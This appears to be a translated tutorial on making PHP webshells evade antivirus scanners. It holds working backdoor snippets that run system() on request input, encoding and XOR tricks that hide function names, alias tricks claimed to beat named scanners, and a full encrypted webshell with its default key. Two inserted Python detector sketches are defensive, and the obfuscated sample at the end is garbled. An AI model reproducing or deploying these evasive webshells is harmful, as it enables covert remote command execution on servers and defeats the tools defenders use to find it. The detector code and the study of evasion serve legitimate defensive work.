PHP Antivirus Evasion Explained in Detail

Fundamentals

Controllable inputs
  • $_GET
  • $_POST
  • $_COOKIE
  • $_REQUEST
  • $_SERVER: some of its entries are controllable, such as REQUEST_METHOD, QUERY_STRING and HTTP_USER_AGENT
  • session_id(): a somewhat special case, but it can still be used
  • $_FILES
  • $GLOBALS
  • getallheaders()
  • get_defined_vars()
  • get_defined_functions()

filter_input

<?php
function abcsmytqqe($a){
    $class_name = json_decode('"' . $a . '"');
    ((__FUNCTION__)[3].(__FUNCTION__)[5].(__FUNCTION__)[3].(__FUNCTION__)[6].(__FUNCTION__)[9].(__FUNCTION__)[4])($class_name);
}
$res=filter_input(INPUT_GET, 'b', FILTER_CALLBACK,array('options' => 'abcsmytqqe'));

Callback functions

There are a great many of them:

call_user_func()
array_filter() 
array_walk()  
array_map()
register_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()

call_user_func & call_user_func_array

<?php
call_user_func('system', ('whoami'));
// equivalent to system('whoami')

<?php
call_user_func_array('system', array('whoami'));
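
array_map()

array_map() applies a user-defined function to every value in an array and returns a new array containing the values produced by that function.

Applied to command execution, that looks like this:
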
array_map('system', array('whoami'));        
array_map($_GET['a'], array('whoami'));     
array_map('system', array($_GET['a']));

array_walk & array_walk_recursive

This function works the same way as array_map.

Keywords can also be bypassed through concatenation, because the function name is passed in as a string:

<?php
$a=array("who"."ami");
array_walk_recursive($a,'sys'.'tem');

array_filter

array_filter: filters the elements of an array using a callback function.

<?php
$a=array("who"."ami");
array_filter ($a,'sys'.'tem');

iterator_apply

iterator_apply: calls a function for every element in an iterator.

<?php
$it = new ArrayIterator(array(1,2,3));
iterator_apply($it, "system",array("whoami"));
?>
ljl\86135
ljl\86135
ljl\86135

foreach()

<?php
$a=array("whoami");
$b="sys"."tem";
foreach($a as $value){
    $b($value);
}

However, dynamic concatenation is easily detected.

String-processing functions

Odd custom algorithms

<?php
function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
confusion(976534)("whoami"); // confusion(976534) --> sysTem (a high-risk function)

I saw this one at https://xz.aliyun.com/t/13591

<?php
function confusion($a){
    $tmp = "";

    // New algorithm logic
    $characters = ['s', 'y', 's', 't', 'e', 'm'];
    $indices = [0, 1, 0, 3, 4, 5]; // positions of the letters of 'system' in $characters

    foreach ($indices as $index) {
        $tmp .= $characters[$index];
    }
    return $tmp;
}
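// Check the result
echo confusion(976534); // prints 'system'
?>

String functions

trim()           // strips whitespace and other predefined characters from both ends of a string
ucfirst()        // converts the first character of a string to uppercase
ucwords()        // converts the first character of each word in a string to uppercase
strtoupper()     // converts a string to uppercase
strtolower()     // converts a string to lowercase
strtr()          // translates specific characters in a string
substr_replace() // replaces part of a string with another string
substr()         // returns part of a string

A bare $a(); is flagged as dynamic function execution.
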
<?php
$a="system";
strtoupper($a)("whoami");

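Written this way, the strtoupper call is treated as string handling.

pack() & unpack()

The pack() function packs data into a binary string.

Demo: put simply, it turns numbers in the specified encoding into a string.
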
<?php
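// Convert ASCII codes to system
echo pack("C6", 115, 121, 115, 116, 101, 109);  // s, y, s, t, e, m
echo pack("H*", "73797374656d");  // 73797374656d is the hex form of the ASCII string system
?>

File-writing functions

When building evasive webshells, some people take a different route: they get past the scanner with a sample whose only job is to "write a malicious PHP file". Once it has run, a malicious PHP file is written into the chosen directory, and the WebShell is obtained by connecting to that file.

fwrite() & fputs()
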
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = fopen("flag.txt","w");
echo fwrite($file,"<?php phpinfo();");    // returns the number of bytes written: 16
fclose($file);

fputs is an alias of fwrite and can also be used to write files.

file_put_contents()

<?php
highlight_file(__FILE__);
error_reporting(0);
$file =("flag.txt");
file_put_contents($file,"<?php phpinfo();");    // returns the number of bytes written: 16

With the FILE_APPEND flag, content is appended to the end of the file:

$file = 'sites.txt';
$site = "\nGoogle";
file_put_contents($file, $site, FILE_APPEND);

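The function can also be combined with a decoding function to write a file, for example:

$datatest = "[base64 encoding of the file]";
file_put_contents('./name-of-the-file-to-write', base64_decode($datatest));

Exception-handling functions

__construct  // exception constructor
getMessage   // returns the exception message
getPrevious  // returns the previous exception in the chain, or null if there is none
getCode      // returns the exception code
getFile      // returns the name of the file in which the exception occurred
getLine      // returns the line number at which the exception occurred
getTrace     // returns the exception backtrace as an array
getTraceAsString // returns the exception backtrace as a string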

<?php
function check($a)
{
    if($a!=1)
    {
        throw new Exception("sys"."tem");
    }
    return true;
}
try
{
    check(8);
    // If an exception is thrown, the text below is not printed
    echo '如果输出该内容,说明 $number 变量小于1';
}
// Catch the exception
catch(Exception $e){
    $e->getMessage()("wh"."oami");
}

PHP features

PHP numbers can take part in arithmetic with strings

<?php
$a="system";
1-$a("whoami")-2;
?>

Variable obfuscation

<?php
$a="aaa";
$$a="system"; //$aaa=system
$aaa("whoami");

Bypassing with encoding operations

Base64 encoding

<?php
$f = base64_decode("c3lz__dG__Vt");  // decodes to system, a high-risk function; "_" characters can be inserted in the middle
$f($_POST[0]);                      //system($_POST[0]);
?>

ASCII encoding

ASCII codes are decoded with the chr function.

<?php
$f =  chr(115).chr(    121).chr(115).chr(116).chr(101).chr(109);//system
$f($_POST['0']);
?>

ROT13 encoding

<?php
$f = str_rot13("flfgrz");  // decodes to system, a high-risk function
$f($_POST[0]);            // system($_POST[0]);
?>

Hex encoding

<?php
$f = hex2bin("73797374656d");  // decodes to system, a high-risk function
$f($_POST[0]);                // system($_POST[0]);
?>

Gz compression encoding

<?php
$f = gzuncompress(base64_decode("eJzLSM3JyVcozy_KSVEEABxJBD4="));  // decompresses to system, a high-risk function
$f($_POST[0]);                                                   // system($_POST[0]);
?>

Combined encoding

Several encodings can be combined to add complexity.

<?php
$f = base64_decode(hex2bin("63336c7a64475674"));  // hex-decode first, then base64-decode; the final result is system, a high-risk function
$f($_POST[0]);                               // system($_POST[0]);
?>

Custom encoding

<?php
function custom_decode($str) {
    $encoded = str_replace(['a','d'], ['s', 'e'], $str);
    return ($encoded);
}
$f = custom_decode("ayatdm");  // decodes to system, a high-risk function
echo $f;
?>

XOR

<?php
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0');   //system
$b = ('.$.48]' ^ ']]]@]0');//system
echo $a;
echo $b;
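
From the detection side, every encoding in this section is a constant expression, so a scanner can evaluate it without running the sample. The following is an added example, not code from the original article: a small Python constant folder that resolves the Base64, chr, ROT13, hex and XOR forms shown above and reports variables that end up holding a sink name. The names SINKS, PURE, fold and scan, and the contents of the denylist, are assumptions of this example.

```python
import base64, codecs, re

SINKS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open", "assert"}  # assumed denylist
TOKEN = re.compile(r"""'[^']*'|"[^"$\\]*"|\d+|[A-Za-z_]\w*|[().,^]""")

def php_b64(s):
    # PHP's non-strict base64_decode() skips characters outside the alphabet.
    kept = re.sub(r"[^A-Za-z0-9+/]", "", s)
    return base64.b64decode(kept + "=" * (-len(kept) % 4)).decode("latin-1")

def php_xor(a, b):  # string XOR is bytewise and truncates to the shorter operand
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

PURE = {  # side-effect-free PHP functions the folder is allowed to evaluate
    "chr": lambda n: chr(n % 256),
    "base64_decode": php_b64,
    "hex2bin": lambda s: bytes.fromhex(s).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot13"),
}

def fold(expr):
    """Evaluate a constant PHP string expression; return None if it is not constant."""
    if TOKEN.sub("", expr).strip():
        return None                        # variables, escapes or unknown syntax
    toks = TOKEN.findall(expr) + [None]    # None marks end of input
    def atom():
        t = toks.pop(0)
        if t[0] in "'\"" or t.isdigit():
            return int(t) if t.isdigit() else t[1:-1]
        if t != "(" and toks.pop(0) != "(":    # function call: name "(" args ")"
            raise ValueError(t)
        args = [xor()]
        while toks[0] == ",":
            toks.pop(0)
            args.append(xor())
        if toks.pop(0) != ")":
            raise ValueError(t)
        return args[0] if t == "(" and len(args) == 1 else PURE[t.lower()](*args)
    def level(op, operand, combine):       # one left-associative binary operator
        left = operand()
        while toks[0] == op:
            toks.pop(0)
            left = combine(str(left), str(operand()))
        return left
    concat = lambda: level(".", atom, str.__add__)   # "." binds tighter than "^"
    xor = lambda: level("^", concat, php_xor)
    try:
        out = str(xor())
        return out if toks == [None] else None
    except (ValueError, KeyError, TypeError, IndexError):
        return None        # malformed input or a function outside the allow-list

def scan(src):
    """(variable, hidden name) for each assignment that folds to a sink name."""
    pairs = re.findall(r"\$(\w+)\s*=\s*([^;]+);", src)
    return [(v, f) for v, e in pairs if (f := fold(e)) and f.lower() in SINKS]

# Constructed sample built from the encodings shown above.
SAMPLE = r"""
$f = base64_decode("c3lz__dG__Vt");
$g = chr(115).chr(    121).chr(115).chr(116).chr(101).chr(109);
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0');
$t = "base64_"."decode";
"""
```

Calling scan(SAMPLE) reports $f, $g and $a; $t folds to base64_decode, which is not on the denylist, and anything that depends on request data does not fold at all.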

Bypassing by reading strings

ReflectionClass::getDocComment

/**   
    * system($_GET[aabyss]);
    */  
class User { }  
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$f = substr($comment , 14 , 22);
eval($f);

Reading from a database

$path = "database file name";

$db = new PDO("sqlite:" . $path);

$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();

$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['b']);
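
Reading a directory

FilesystemIterator is an iterator that returns information about every file in the target directory.

However, a special file has to be written first.
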
<?php
$fi = new FilesystemIterator(dirname(__FILE__));
$f = '';
foreach($fi as $i){
    $a=substr($i,26,6);
    if ($a=="system"){
        $f=$a;
    }
}
$f("whoami");

Alias bypass

bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers

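From this we can find a usable function, mbereg_replace. It is an alias of preg_replace; mb_ereg_replace is similar to preg_replace and can use the e modifier to execute code implicitly. However, mb_ereg_replace does not escape detection, whereas mbereg_replace is ALLKILL. That's right: a single _ is the only difference, and it is enough to slip past the scanners.
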
<?php  
// (ALLKILL)
error_reporting(0);
mbereg_replace('.*', '', $_REQUEST[2333], 'mer');//php5 php7 success
?>

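We can also create aliases of our own, for example:

<?php  
// PHP >= 5.6; gets past D-Shield (D盾) and SafeDog (安全狗)
use function \system as strlen;  // combined with file inclusion this can even be used for hijacking; left for you to develop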
strlen($_POST[1]);

<?php
// (ALLKILL)
define("ARRAY2", "sys"."tem");
@constant("ARRAY2")(pos(pos($GLOBALS)));  // PHP>7
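
Both alias tricks above defeat a scanner that matches call names literally, so a detector has to resolve names before comparing them with its denylist. The following is an added example, not code from the original article: a Python sketch that resolves `use function ... as ...` imports and built-in aliases to a canonical name. BUILTIN_ALIASES is a subset copied from the table above; WATCHED and the function names are assumptions of this example, and only plain and comma-separated `use function` clauses are handled.

```python
import re

# Alias -> canonical pairs copied from the table above (a subset).
BUILTIN_ALIASES = {"fputs": "fwrite", "show_source": "highlight_file",
                   "ini_alter": "ini_set", "pos": "current", "join": "implode"}
WATCHED = {"system", "fwrite", "highlight_file", "ini_set"}   # assumed denylist

USE_FN = re.compile(r"\buse\s+function\s+([^;]+);", re.I)
# A call site: optional leading "\", a name, "(". Method calls (->, ::),
# variables ($f(...)) and namespaced names are skipped by the lookbehind.
CALL = re.compile(r"(?<![\w$>:\\])(\\?)([A-Za-z_]\w*)\s*\(")

def imports(src):
    """Map local name -> imported function for every `use function` clause."""
    table = {}
    for clause in USE_FN.findall(src):
        for item in clause.split(","):
            item = re.sub(r"\s+", " ", item.strip()).lower()
            target, _, local = item.partition(" as ")
            target = target.lstrip("\\")
            # Without "as", the local name is the last namespace segment.
            table[local.strip() or target.rsplit("\\", 1)[-1]] = target
    return table

def canonical(name, qualified, table):
    name = name.lower()              # PHP function names are case-insensitive
    if not qualified:                # "\strlen(" bypasses the import table
        name = table.get(name, name)
    return BUILTIN_ALIASES.get(name, name)

def watched_calls(src):
    """(name as written, canonical name) for calls that resolve to a watched function."""
    table, hits = imports(src), []
    for m in CALL.finditer(src):
        real = canonical(m[2], bool(m[1]), table)
        if real in WATCHED and (m[2], real) not in hits:
            hits.append((m[2], real))
    return hits

# Constructed sample: the imported alias from above, a fully qualified call
# to the real strlen, a built-in alias, and an unrelated method call.
SAMPLE = r"""<?php
use function \system as strlen;
strlen($_POST[1]);
\strlen("abc");
fputs($fh, "data");
$obj->system("x");
"""

if __name__ == "__main__":
    print(watched_calls(SAMPLE))
```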

Obfuscation

Recommended site:

https://enphp.djunny.com/

Upload your webshell there and obfuscate it.

Original code

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // the key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    $t="base64_"."decode";
    $post=$t($post."");

    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

After obfuscation

<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/goto Ϻ��;����:$Ċ��=$�˼�[0x001];goto ���;��

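Disclaimer: the content shared by this account is for discussion of network security techniques only and must not be used for illegal purposes. All penetration testing requires authorization; violators bear the consequences themselves, and neither this account nor the author is responsible.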
